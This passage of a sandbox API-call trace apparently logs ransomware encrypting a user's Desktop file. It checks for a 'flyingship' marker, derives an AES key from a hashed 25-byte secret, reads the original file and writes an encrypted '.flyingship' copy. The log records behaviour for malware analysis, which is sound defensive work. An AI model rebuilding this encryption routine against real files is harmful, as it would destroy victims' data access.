HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mKicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KicOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cOCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OCoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0162.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CoALM.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0162.482] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0162.482] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0162.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0162.482] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa07af50, ftCreationTime.dwHighDateTime=0x1d5dc36, ftLastAccessTime.dwLowDateTime=0x836c1090, ftLastAccessTime.dwHighDateTime=0x1d5e62a, ftLastWriteTime.dwLowDateTime=0x836c1090, ftLastWriteTime.dwHighDateTime=0x1d5e62a, nFileSizeHigh=0x0, nFileSizeLow=0xd79a, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="mKicOCoALM.flv", cAlternateFileName="MKICOC~1.FLV")) returned 0x90af58 [0162.482] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0162.482] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0162.482] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.482] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0162.483] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0162.483] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.483] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0162.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0162.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0162.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0162.483] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0162.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0162.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0162.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0162.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0162.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0162.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0162.484] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0162.484] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0162.484] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0162.484] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0162.484] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.484] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0162.484] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.484] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0162.484] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.484] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0162.485] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0162.485] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.485] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.485] CryptHashData (hHash=0x90ae18, pbData=0x8debf0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0162.485] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.485] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0162.485] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.485] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0162.485] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.485] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.485] CryptDestroyHash (hHash=0x90ae18) returned 1 [0162.486] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mkicocoalm.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0162.486] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.486] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0162.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0162.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0162.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0162.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0162.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0162.486] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0162.487] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0162.487] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.487] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0162.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0162.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.488] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flyingship.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mkicocoalm.flyingship.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0162.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0162.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0162.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0162.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0162.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0162.488] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0162.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0162.489] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0162.489] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.489] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0162.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.489] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0162.489] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0xd79a, lpOverlapped=0x0) returned 1 [0162.492] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0162.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0162.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0162.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0162.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0162.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0162.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0162.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0162.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0162.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.493] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0162.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0162.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0162.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0162.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.494] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0162.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0162.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.494] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.494] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0162.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0162.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0162.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0162.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0162.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0162.494] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0162.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 